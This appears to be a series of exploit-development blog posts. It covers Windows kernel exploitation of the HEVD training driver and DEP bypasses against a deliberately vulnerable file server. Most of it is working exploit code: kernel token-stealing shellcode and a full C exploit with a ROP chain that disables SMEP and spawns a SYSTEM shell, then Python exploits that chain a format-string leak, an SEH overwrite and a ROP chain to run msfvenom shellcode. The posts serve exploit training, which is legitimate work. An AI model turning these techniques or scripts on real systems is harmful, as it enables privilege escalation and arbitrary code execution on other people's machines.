0: kd> dt nt!_EPROCESS
...
+0x440 UniqueProcessId      : Ptr64 Void
+0x448 ActiveProcessLinks   : _LIST_ENTRY
...
+0x4b8 Token                : _EX_FAST_REF
...

If we can read this pointer & copy it over the one from our process, we get full SYSTEM privileges. Essentially the shellcode will find our EPROCESS and save a pointer to it. Then it will walk ActiveProcessLinks (which is a linked list of processes) until it finds a SYSTEM process and copies the token pointer from that one over the one from our process.

[BITS 64]
start:
  mov rax, [gs:0x188]       ; KPCRB.CurrentThread (_KTHREAD)
  mov rax, [rax + 0xb8]     ; APCState.Process (current _EPROCESS)
  mov r8, rax               ; Store current _EPROCESS ptr in RBX

loop:
  mov r8, [r8 + 0x448]      ; ActiveProcessLinks
  sub r8, 0x448             ; Go back to start of _EPROCESS
  mov r9, [r8 + 0x440]      ; UniqueProcessId (PID)
  cmp r9, 4                 ; SYSTEM PID? 
  jnz loop                  ; Loop until PID == 4

replace:
  mov r9, [r8 + 0x4b8]      ; Get SYSTEM token
  and r9, 0xf0              ; Clear low 4 bits of _EX_FAST_REF structure
  mov [rax + 0x4b8], r9     ; Copy SYSTEM token to current process
  
  xor rax, rax
  ret

Note that depending on which operating system you are targeting these offsets will change and you have to find them via WinDBG. To compile the shellcode, we can use NASM/radare2:

nasm shellcode.asm -o shellcode.bin -f bin
radare2 -b 32 -c 'pc' ./shellcode.bin
#define _BUFFER_SIZE 256
const uint8_t buffer[_BUFFER_SIZE] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  ...
};

While this will work fine and replace the token – we are still in an IOCTL and have messed with the stack. Just returning from here will cause a BSOD. There are at least 2 possibilities here – either we figure out how to restore the stack to the point where we can return somewhere that will not crash or use a generic way to avoid crashes.

For this post we choose the generic way by Kristal and append our shellcode:

[BITS 64]
start:
  mov rax, [gs:0x188]       ; KPCRB.CurrentThread (_KTHREAD)
  mov rax, [rax + 0xb8]     ; APCState.Process (current _EPROCESS)
  mov r8, rax               ; Store current _EPROCESS ptr in RBX

loop:
  mov r8, [r8 + 0x448]      ; ActiveProcessLinks
  sub r8, 0x448             ; Go back to start of _EPROCESS
  mov r9, [r8 + 0x440]      ; UniqueProcessId (PID)
  cmp r9, 4                 ; SYSTEM PID? 
  jnz loop                  ; Loop until PID == 4

replace:
  mov rcx, [r8 + 0x4b8]      ; Get SYSTEM token
  and cl, 0xf0               ; Clear low 4 bits of _EX_FAST_REF structure
  mov [rax + 0x4b8], rcx     ; Copy SYSTEM token to current process

cleanup:
  mov rax, [gs:0x188]       ; _KPCR.Prcb.CurrentThread
  mov cx, [rax + 0x1e4]     ; KTHREAD.KernelApcDisable
  inc cx
  mov [rax + 0x1e4], cx
  mov rdx, [rax + 0x90]     ; ETHREAD.TrapFrame
  mov rcx, [rdx + 0x168]    ; ETHREAD.TrapFrame.Rip
  mov r11, [rdx + 0x178]    ; ETHREAD.TrapFrame.EFlags
  mov rsp, [rdx + 0x180]    ; ETHREAD.TrapFrame.Rsp
  mov rbp, [rdx + 0x158]    ; ETHREAD.TrapFrame.Rbp
  xor eax, eax  ;
  swapgs
  o64 sysret  

This makes our full exploit:

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

BYTE sc[256] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
  0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
  0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
  0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
  0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
  0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
  0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
  0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
  0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
  0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

QWORD getBaseAddr(LPCWSTR drvName) {
	LPVOID drivers[512];
	DWORD cbNeeded;
	int nDrivers, i = 0;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
		WCHAR szDrivers[512];
		nDrivers = cbNeeded / sizeof(drivers[0]);
		for (i = 0; i < nDrivers; i++) {
			if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
				if (wcscmp(szDrivers, drvName) == 0) {
					return (QWORD)drivers[i];
				}
			}
		}
	}
	return 0;
}

int main()
{
	HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		exit(1);
	}

	QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
	printf("[>] NTBase: %llx\n", ntBase);
	QWORD POP_RCX = ntBase + 0x20a386;
	QWORD MOV_CR4_RCX = ntBase + 0x3acd47; 

	int index = 0;
	int bufSize = 2072 + 4 * 8;

	LPVOID uBuffer = VirtualAlloc(NULL, bufSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	LPVOID shellcode = VirtualAlloc(NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlFillMemory(uBuffer, bufSize, '\x41');
	RtlCopyMemory(shellcode, sc, 256);

	QWORD* rop = (QWORD*)((QWORD)uBuffer + 2072);
	
	*(rop + index++) = POP_RCX;
	*(rop + index++) = 0x350ef8 ^ 1UL << 20;
	*(rop + index++) = MOV_CR4_RCX;
	*(rop + index++) = (QWORD)shellcode;

	DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, bufSize, NULL, 0, NULL, NULL);
	
	printf("[>] Enjoy your shell!\n", ntBase);
	system("cmd");
    return 0;
}

Running the exploit results in a SYSTEM shell on the target:

The post Windows Kernel Exploitation – HEVD x64 Stack Overflow appeared first on Vulndev.

Windows Kernel Exploitation – VM Setup

By: xct
1 July 2022 at 09:43

In this series about Windows kernel exploitation, we will explore various kernel exploit techniques & targets. This topic is mainly something I studied to prepare for AWE. This short first part will deal with the VM setup for the rest of the series. I can not offer downloadable VMs so you will have to follow the steps outlined here to get a comparable environment.

OS Setup

We will use Windows 11 for both the debugger and the debugger and everything will be running on VMware Workstation 16. To allow the installation of Windows 11 on VMWare, we will have to encrypt the VM:

Then we add a TPM:

If you don’t have a Windows 11 ISO you can get a version here. Note that using Insider Preview is not a good idea since the symbols are not always fully available. After the installation is completed & all updates are installed, create a low-privileged user called user:

net user user user /add

We also want to disable the Windows Update Service (we don’t want gadgets to change because windows updates). Now we continue to install tools we will need later on.

WinDbgX

WindbgX (or Preview) can be installed for free from the Microsoft Store. We are not using python/mona so we won’t install it. After installing, start it once and set the symbol path in File->Settings->Debugging Settings to srv*c:\symbols*http://msdl.microsoft.com/download/symbols.

Other Tools

Other tools we install/download on this VM are Visual Studio, Visual Studio Code, rp++, Ida Free.

Duplicating the VM

After preparing our VM, we need to clone it (Right-Click on VM->Manage->Clone) in order to get a Debugger & Debuggee VM.

At this point, you should have 2 identical VMs. On older versions of windows, we would have to modify the .vmx files in order to allow debugging via serial port – as this is all Windows 10+ we can, however, debug everything nicely via TCP/IP.

Setting up Kernel Debugging

First, we set up proper networking. In my case both VMs have a NAT adapter for internet access & an additional adapter to communicate (VMNET-X):

  • Debugger VM: 172.16.0.100
  • Debuggee VM: 172.16.0.101

On the debuggee VM:

bcdedit /debug on
bcdedit /dbgsettings net hostip:172.16.0.100 port:50000 key:1.2.3.4

On the debugger VM we just have to start WinDbgX and attach it to the kernel:

After a restart of the debuggee WinDbgX automatically attaches and breaks for us:

Connected to Windows 10 22000 x64 target at (Fri Jul  1 02:29:02.526 2022 (UTC - 7:00)), ptr64 TRUE
Kernel Debugger connection established.
Symbol search path is: srv*
Executable search path is: 
Windows 10 Kernel Version 22000 MP (1 procs) Free x64
Edition build lab: 22000.1.amd64fre.co_release.210604-1628
Machine Name:
Kernel base = 0xfffff804`27000000 PsLoadedModuleList = 0xfffff804`27c29650
System Uptime: 0 days 0:00:02.213
KDTARGET: Refreshing KD connection


We continue with g and continue the startup. At this point our setup is complete and we create a snapshot on both VMs (with the debugger running). Finally to make sure everything is working we start notepad.exe on the debuggee VM & then see if we can debug it:

!dml_proc
...
ffff9485`c0f26080 23c8 Notepad.exe  
...
.process /i ffff9485c0f26080 Notepad.exe
g
!process
PROCESS ffff9485c0f26080
    SessionId: 1  Cid: 23c8    Peb: 5fab251000  ParentCid: 10ec
    DirBase: 1aec4a000  ObjectTable: ffffa80fb00d0800  HandleCount: 257.
    Image: Notepad.exe

At this point, everything is working as expected and we can start looking at exploitation in the next post.

Note that under normal circumstances you can not load any unsigned drivers like HEVD on windows 11 – however when a kernel debugger is attached, this is not true anymore.

The post Windows Kernel Exploitation – VM Setup appeared first on Vulndev.

Bypassing DEP with VirtualProtect (x86)

By: xct
14 June 2022 at 18:46

In the last post we explored how to exploit the rainbow2.exe binary from the vulnbins repository using WriteProcessMemory & the β€œskeleton” method. Now we are going to explore how to use VirtualProtect and instead of setting up the arguments on the stack with dummy values and then replacing them, we are going to use the pushad instruction to push alle registers on the stack & then execute our function.

We start from the following exploit template:

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

rop_gadgets = [
      0xdeadc0de,
]

rop = b""
rop += p32(binary_base + 0x159d)*(32) # ropnop
for g in rop_gadgets:
      rop += p32(g)

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop
buf += b"A" * (offset-len(rop))
buf += b"B" * 4 
buf += p32(binary_base + 0x11396)
buf += b"D" * (size-len(buf))
p.sendline(buf)
input("Press enter to continue..")
p.close() 
0:003> `p
deadc0de ??              ???

As before, we are going to use a stack pivot to land in our input buffer and execute a rop chain which just consists of a dummy instruction at this point. Let’s explore how pushad works: Pushes the following registers in the following order onto the stack: EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI (https://c9x.me/x86/html/file_module_x86_id_270.html) .

We also need to know what arguments VirtualProtect expects:

BOOL VirtualProtect(
  [in]  LPVOID lpAddress,
  [in]  SIZE_T dwSize,
  [in]  DWORD  flNewProtect,
  [out] PDWORD lpflOldProtect
);

The first argument lpAddress is the address at which we want to change memory protections, dwSize is giving the size, flNewProtect is a mask for the new protections we want (0x40 = PAGE_EXECUTE_READWRITE) and lpflOldProtect must be a writeable address so the old protections can be stored. If we look at the order pushad places the values on the stack, we should setup the registers as follows (which will end up on the stack exactly in the order below but in reverse, e.g. ropnop being the first gadget):

# Registers
EAX 90909090  => Shellcode                                               
ECX &writable => lpflOldProtect                                
EDX 00000040  => flNewProtect                                   
EBX 00000501  => dwSize                                           
ESP ????????  => lpAddress (ESP)                         
EBP ????????  => Redirect control fow to ESP              
ESI ????????  => &VirtualProtect
EDI ????????  => RopNop

Setting those registers up correctly requires some planning – as soon as you are done setting up one of them you can not use it anymore to setup the other registers. That’s why we have to setup the more commonly used registers at the end.

We start by setting up ebx. Note that in order to get 0x501 into the register without having null bytes we could use a add, DWORD instruction and calculate the difference. In this case there is add eax,5D40C033;. If we calculate ? 0x501 - 0x5d40c033 = a2bf44ce we get the value we have to put into that register to end up with the value we want.

# EBX
# Blocked: None
0x4CBFB + binary_base,  # pop eax; ret;
0xa2bf44ce,             # put delta into eax (goal: 0x00000201 into ebx)
0x7720E + binary_base,  # add eax,5D40C033; ret;
0x3AE24 + binary_base,  # xchg eax, ebx; ret;

Now we setup edx. We use the same trick again to get the null byte free value of 0x40 into the register.

# EDX
# Blocked: EBX
0x4CBD7 + binary_base,  # pop eax; ret;
0xa2a7fdd6,             # put delta into eax (goal: 0x00000040 into edx)
0x76EFF + binary_base,  # add eax, 0x5D58026A       
0x1ABA5 + binary_base,  # xchg eax, edx; dec eax; add al, byte ptr [eax]; pop ecx; ret;
0x41414141,             # dummy

We continue by setting ecx. Since this needs a writable address we get one via WinDBG as described in the other post and just pop the value into the register.

# ECX
# Blocked: EBX, EDX
0x72D31 + binary_base,  # pop ecx; ret;
0xA635A + binary_base,  # &writable location

For edi, we set the address of a ropnop gadget directly via pop:

# EDI
# Blocked: EBX, EDX, ECX
0x32301 + binary_base,  # pop edi; ret;
0x774C7 + binary_base,  # ropnop

We set esi by popping the address of a jmp eax gadget. Normally this would hold the address of VirtualProtect but we will store VirtualProtect at the very end in eax – so placing jmp eax here will achieve the same.

# ESI
# Blocked EBX, EDX, ECX, EDI
0x24261 + binary_base,  # pop esi; ret;      
0x14AF9 + binary_base,  # jmp eax (just stored, not executed right away)

Finally we set up eax with the address of VirtualProtect. This is a bit tricky because we do not have a leak in kernel32 and the binary does not use VirtualProtect itself. We can however just as in the other post get the address of another kernel32 function from the IAT and then subtract the offset.

0:001> ?kernel32!WriteFile - kernel32!VirtualProtectStub
Evaluate expression: 12528 = 000030f0
# EAX
# Blocked EBX, EDX, ECX, EDI, ESI
0x704F4 + binary_base,  # pop eax; ret;
0x9015C + binary_base,  # IAT WriteFile
0x2BB8E + binary_base,  # mov eax, dword ptr [eax] / dereference IAT to get kernel32 ptr
0x113AB + binary_base,  # sub eax,1000 
0x113AB + binary_base,  # sub eax,1000 
0x113AB + binary_base,  # sub eax,1000 
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x7D695 + binary_base,  # pop ebp dummy 

0x752EC + binary_base,  # pushad
0x11394 + binary_base,  # jmp esp

At this point we can call the pushad instruction to put everything on the stack which then looks as follows:

0x752EC + binary_base,  # pushad
0x11394 + binary_base,  # jmp esp
eax=76c304c0 ebx=00000501 ecx=3fb5635a edx=00000040 esi=3fac4af9 edi=3fb274c7
eip=3fb252ec esp=0151f790 ebp=3fb2d695

0:003> dd /c1 esp
0151f790  3fb274c7 # ropnop
0151f794  3fac4af9 # jmp eax (eax=&VirtualProtect)
0151f798  3fb2d695 # pop ebp (pops 76c304c0)
0151f79c  0151f7b0 # ptr sc  ----
0151f7a0  00000501               |
0151f7a4  00000040               |
0151f7a8  3fb5635a               |
0151f7ac  76c304c0               |
0151f7b0  3fac1394 # jmp esp     |
0151f7b4  90909090  <------------
...

At this point we can execute our shellcode and get our calc. The full exploit can be found below:

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

sc =  b""
sc += b"\x90"*0x10
# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v sc -b '\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2f\x5C'
sc += b"\x29\xc9\x83\xe9\xcf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
sc += b"\x76\x0e\xad\x9c\x2a\x96\x83\xee\xfc\xe2\xf4\x51\x74"
sc += b"\xa8\x96\xad\x9c\x4a\x1f\x48\xad\xea\xf2\x26\xcc\x1a"
sc += b"\x1d\xff\x90\xa1\xc4\xb9\x17\x58\xbe\xa2\x2b\x60\xb0"
sc += b"\x9c\x63\x86\xaa\xcc\xe0\x28\xba\x8d\x5d\xe5\x9b\xac"
sc += b"\x5b\xc8\x64\xff\xcb\xa1\xc4\xbd\x17\x60\xaa\x26\xd0"
sc += b"\x3b\xee\x4e\xd4\x2b\x47\xfc\x17\x73\xb6\xac\x4f\xa1"
sc += b"\xdf\xb5\x7f\x10\xdf\x26\xa8\xa1\x97\x7b\xad\xd5\x3a"
sc += b"\x6c\x53\x27\x97\x6a\xa4\xca\xe3\x5b\x9f\x57\x6e\x96"
sc += b"\xe1\x0e\xe3\x49\xc4\xa1\xce\x89\x9d\xf9\xf0\x26\x90"
sc += b"\x61\x1d\xf5\x80\x2b\x45\x26\x98\xa1\x97\x7d\x15\x6e"
sc += b"\xb2\x89\xc7\x71\xf7\xf4\xc6\x7b\x69\x4d\xc3\x75\xcc"
sc += b"\x26\x8e\xc1\x1b\xf0\xf6\x2b\x1b\x28\x2e\x2a\x96\xad"
sc += b"\xcc\x42\xa7\x26\xf3\xad\x69\x78\x27\xda\x23\x0f\xca"
sc += b"\x42\x30\x38\x21\xb7\x69\x78\xa0\x2c\xea\xa7\x1c\xd1"
sc += b"\x76\xd8\x99\x91\xd1\xbe\xee\x45\xfc\xad\xcf\xd5\x43"
sc += b"\xce\xfd\x46\xf5\x83\xf9\x52\xf3\xad\x9c\x2a\x96"

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

rop_gadgets = [
      # EBX
      # Blocked: None
      0x4CBFB + binary_base,  # pop eax; ret;
      0xa2bf44ce,             # put delta into eax (goal: 0x00000501 into ebx)
      0x7720E + binary_base,  # add eax,5D40C033; ret;
      0x3AE24 + binary_base,  # xchg eax, ebx; ret;

      # EDX
      # Blocked: EBX
      0x4CBD7 + binary_base,  # pop eax; ret;
      0xa2a7fdd6,             # put delta into eax (goal: 0x00000040 into edx)
      0x76EFF + binary_base,  # add eax, 0x5D58026A       
      0x1ABA5 + binary_base,  # xchg eax, edx; dec eax; add al, byte ptr [eax]; pop ecx; ret;
      0x41414141,             # dummy

      # ECX
      # Blocked: EBX, EDX
      0x72D31 + binary_base,  # pop ecx; ret;
      0xA635A + binary_base,  # &writable location

      # EDI
      # Blocked: EBX, EDX, ECX
      0x32301 + binary_base,  # pop edi; ret;
      0x774C7 + binary_base,  # ropnop

      # ESI
      # Blocked EBX, EDX, ECX, EDI
      0x24261 + binary_base,  # pop esi; ret;      
      0x14AF9 + binary_base,  # jmp eax (just stored, not executed)

      # EAX
      # Blocked EBX, EDX, ECX, EDI, ESI
      0x704F4 + binary_base,  # pop eax; ret;
      0x9015C + binary_base,  # IAT WriteFile
      0x2BB8E + binary_base,  # mov eax, dword ptr [eax] / dereference IAT to get kernel32 ptr
      0x113AB + binary_base,  # sub eax,1000 
      0x113AB + binary_base,  # sub eax,1000 
      0x113AB + binary_base,  # sub eax,1000 
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x7D695 + binary_base,  # pop ebp dummy 

      0x752EC + binary_base,  # pushad
      0x11394 + binary_base,  # jmp esp
]

rop = b""
rop += p32(binary_base + 0x159d)*(32) # ropnop
for g in rop_gadgets:
      rop += p32(g)

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop
buf += sc
buf += b"A" * (offset-len(rop)-len(sc))
buf += b"B" * 4 
buf += p32(binary_base + 0x11396)
buf += b"D" * (size-len(buf))
p.sendline(buf)
input("Press enter to continue..")
p.close() 

The post Bypassing DEP with VirtualProtect (x86) appeared first on Vulndev.

Bypassing DEP with WriteProcessMemory (x86)

By: xct
12 June 2022 at 12:31

Intro

In this post I will show an example on how to bypass DEP with WriteProcessMemory. This is a bit more complicated than doing it with VirtualProtect but nonetheless an interesting technical challenge. For the target binary I will use rainbow2.exe from my vulnbins repository.

I will skip the reversing/vulnerability discovery part for this post (feel free to explore it by yourself) – essentially we have a file server that has 2 commands:

LST <PATH>
GET <PATH>

Enabled protections are GS, ASLR & DEP. The binary has (at least) 2 vulnerabilities, a format-string vulnerability in path & a stack overflow that is also in path. Note that if you want to play with the binary you have to put it in C:\shared\ as it expects this as the file root.

Format String Vulnerability

By supplying a path containing format string specifies like %p, we can leak the contents of the stack. This will allow us to leak a pointer from the binary, calculate the binaries base address & therefore defeating ASLR.

Stack Overflow

By supplying a path longer than 1024 we overflow a stack buffer. Since GS is enabled we can not just write through the stack cookie and over the return address in order to exploit it. We can however provide a sufficiently large buffer so that the SEH handler gets overwritten, which defeats GS as we can continue execution from there without returning from the function.

Getting Started

Knowing the vulnerabilities we start by writing an exploit poc that leaks the base address:

#!/usr/bin/env python3
from pwn import *

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

We connect to the server and send LST |%p|%p|%p|%p|, which leaks 4 pointers from the stack:

[DEBUG] Sent 0x12 bytes:
    b'LST |%p|%p|%p|%p|\n'
[DEBUG] Received 0x41 bytes:
    b'ERROR: Can not open Path: |8ACA5DF4|3FAC4120|3FAC4120|0133E550|\n'

In WinDBG we can see that 0x3fac4120 is an address of the binary itself. We calculate the difference of this pointer to the load address of the binary:

0:001> ? 3fac4120-3fab0000 
Evaluate expression: 82208 = 00014120

Since this offset does not change between restarts and the leaked pointer is always the 2nd value on the stack, we can reliably subtract it to get the base address of the binary. If you are used to binary exploitation on linux you might wonder if we can use %n here to get a write primitive. This is not possible because Visual Studio prevents %n usage by default.

The next task is to find the offset at which we overwrite SEH. To do so we generate a pattern (msf-pattern_create -l 4000), send it and use it to get the offset (msf-pattern_offset -q ... -l 4000) at which we have to put the value that overwrites our SEH entry. We don’t know much about the required length yet but trying a few values and observing if any of them crashes the application and if a pattern value appears on !exchain is a viable approach. Eventually this will lead to the offset 1032.

With these new insights we can update the poc to crash the target and place Bs inside SEH & Cs inside NSEH.

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += b"A" * (offset)
buf += b"B" * 4 # nseh
buf += b"C" * 4 # seh
buf += b"D" * (size-len(buf))
p.sendline(buf)

input("Press enter to continue..")
p.close()  
0:001> !exchain
0170f6a0: 43434343 (SEH)
Invalid exception stack at 42424242 (NSEH)

Warming Up

Now we have to find a single gadget that somehow gets us back to our input buffer.

0:001> r esp
esp=0170eab0
0:001> s -a 0 L?80000000 "AAAAAAAAAAAAAAA"
0133e66c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
...
015205c0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
...
0170f298  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

We find the start of our As is 3 times in memory. The last one looks like the most promising one because it’s somewhat close to our stack pointer:

0:001> ? 0170f298 - 0170eab0
Evaluate expression: 2024 = 000007e8

To find a gadget that can jump that far (or bit a further, it does not have to be exact) we can use ropper:

ropper --file rainbow2.exe --console
search add esp, %
...
0x4011139d: add esp, 0xd60; ret;
0x40111396: add esp, 0xe10; ret;
...

These look promising. We replace the Bs with the gadget that adds 0xe10 to esp, taking the leaked binary base into account and then run the exploit again.

...
buf += b"B" * 4 # nseh
buf += p32(binary_base + 0x11396)
buf += b"D" * (size-len(buf))
...

We set a breakpoint on the gadget and see if we can hit our buffer:

0:003> !exchain
0164fbd4: filesrv+11396 (3fac1396)
Invalid exception stack at 42424242
0:003> ba e1 3fac1396
0:003> g
Breakpoint 0 hit
filesrv+0x11396:
3fac1396 81c4100e0000    add     esp,0E10h
0:003> p
3fac139c c3              ret
0:003> dd esp
0164f844  41414141 41414141 41414141 4141414

We indeed managed to land inside our buffer, more precisely at the part before our SEH gadget. By going back a bit we can see that we are about 0x78 bytes into our buffer.

0:003> dd esp-80 L40
0164f7c4  00000000 0000000f 41414141 41414141
0164f7d4  41414141 41414141 41414141 41414141
...

This is pretty good since we placed 1036 As and most of them are still ahead of us, leaving us with some room to work with. Since DEP is enabled, we can not simply execute shellcode here and have to think about how we can utilize ROP to make progress.

Playing with ROP

Ultimately we want to call a function that allows us to get around DEP and execute shellcode. Good candidates are VirtualProtect, VirtualAlloc or WriteProcessMemory. Since we are on x86, the arguments for function calls will be placed on the stack. I’m aware of 2 different approaches to setup function arguments in this situation. We could carefully prepare the registers and then execute pushad so the values are put onto the stack – this has all to be done in ROP though and everytime you setup a register you can not use it anymore later on which makes this a bit tricky.

Another approach is to prepare a call β€œskeleton”, an area that has dummy values for the function arguments on the stack. We then get a reference to the skeleton and replace the dummy values with the ones we need. In the end we pivot the stack to the skeleton and therefore execute the function we want.

As mentioned in the beginning, for this post we want to call WriteProcessMemory. This will allow us to write our shellcode to a codecave that is already executable but not writeable. WriteProcessMemory internally calls VirtualProtect to temporarily make the area writeable, writes the data & then restores memory permissions. WriteProcessMemory has the following Signature:

BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
);

Which in our skeleton looks like this:

0xffffffff, # hProcess (-1 == current process)
codecave,   # lpBaseAddress (dst)
0x42424242, # lpBuffer (src) 
0x43434343, # nSize
writeable,  # lpNumberOfBytesWritten

This approach has one caveat – if we have to avoid bad bytes in our shellcode and we copy it to a non writable area, we can not use any shellcode that needs to modify itself (e.g. all msfencoders). In order to get around that we will have to do the shellcode encoding before we send it and then use ROP to decode it, while it is still on the stack (before we copy it & jump to the codecave copy).

To discover bad bytes we send all bytes from 0x00 – 0xFF and remove all the ones where the binary does not crash anymore or those that get mangled. This results in the following bad chars:

\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C

Since it will be pretty difficult to craft shellcode that does not contain any of these we will go with the ROP shellcode decoder as just mentioned. Before we dive into that, let’s look at the structure the exploit is going to have. Since we are dealing with some space restrictions we have to be careful about the layout.

LST | Skeleton + RopNops + Decoder + RopNops | NSEH (dummy) + SEH (stack pivot) | RopNops + RopWriteProcessMemorySetup + Shellcode + Padding |
    | ----------------1036-------------------|----------------8-----------------|------------------------ ~2200 -----------------------------|

Note that even though we send 4000 Bytes, not all of them will end up on the stack. We are running into a page boundary which will cut it more closer to 3200-3300 Bytes.

Shellcode Encoding & Decoding

The first problem we are going to tackle is the Shellcode encoding & decoding. Our shellcode for this post will be the following one:

# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v sc -e none
sc =  b""
sc += b"\x90"*0x30
sc += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
sc += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
sc += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
sc += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
